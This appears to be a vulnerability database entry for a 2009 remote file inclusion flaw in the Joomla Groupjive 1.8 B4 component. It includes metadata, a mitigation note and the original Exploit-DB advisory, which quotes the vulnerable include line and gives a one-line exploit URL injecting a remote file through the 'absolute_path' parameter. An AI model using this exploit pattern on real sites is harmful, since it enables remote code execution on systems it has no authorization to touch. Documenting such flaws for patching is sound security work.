Joomla Component groupjive 1.8 B4 RFI Vulnerability

vendor:

Groupjive

by:

M3NW5

9.3

CVSS

HIGH

Remote File Inclusion (RFI)

CWE

Product Name: Groupjive

Affected Version From: 1.8 B4

Affected Version To: 1.8 B4

Patch Exists: YES

Related CWE: N/A

CPE: a:groupjive:groupjive:1.8_b4

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Joomla Component groupjive 1.8 B4 RFI Vulnerability

A vulnerability exists in Joomla Component groupjive 1.8 B4, which allows a remote attacker to include a file from a remote host via the 'absolute_path' parameter in the 'helpers.php' script. An attacker can exploit this vulnerability to execute arbitrary code on the vulnerable system.

Mitigation:

The vendor has released an update to address this vulnerability. Users are advised to upgrade to the latest version of the application.

Source

Exploit-DB raw data:

#############################################################
Joomla Component groupjive 1.8 B4 RFI Vulnerability
#############################################################
Author	 : M3NW5
Homepage : http://www.indonesiancoder.com
contach  : m3nw5@hackermail.com
Location : INDONESIA
#############################################################
Achievo 1.3.4 Information
#############################################################
Vendor	 : http://www.groupjive.org/
Scripts  : http://forge.joomlapolis.com/projects/list_files/groupjive
File	 : helpers.php
	   include_once ( $absolute_path . '/components/com_groupjive/compat/array_combine.php' );
Exploit	 : http://target.com/components/com_groupjive/helpers.php?absolute_path=<deviL>
#############################################################
thenqyu	 : IndonesianCoder.SurabayaHackerLink.ServerIsDown.Kill-9
	   Don Tukulesto.KaMtiEz.Vyc0d.Arianom.Denbayan.mistersaint
	   gonzhack.cyb3r_tr0n.m364tr0n.
	   YogyaCarderLink.v3n0m
#############################################################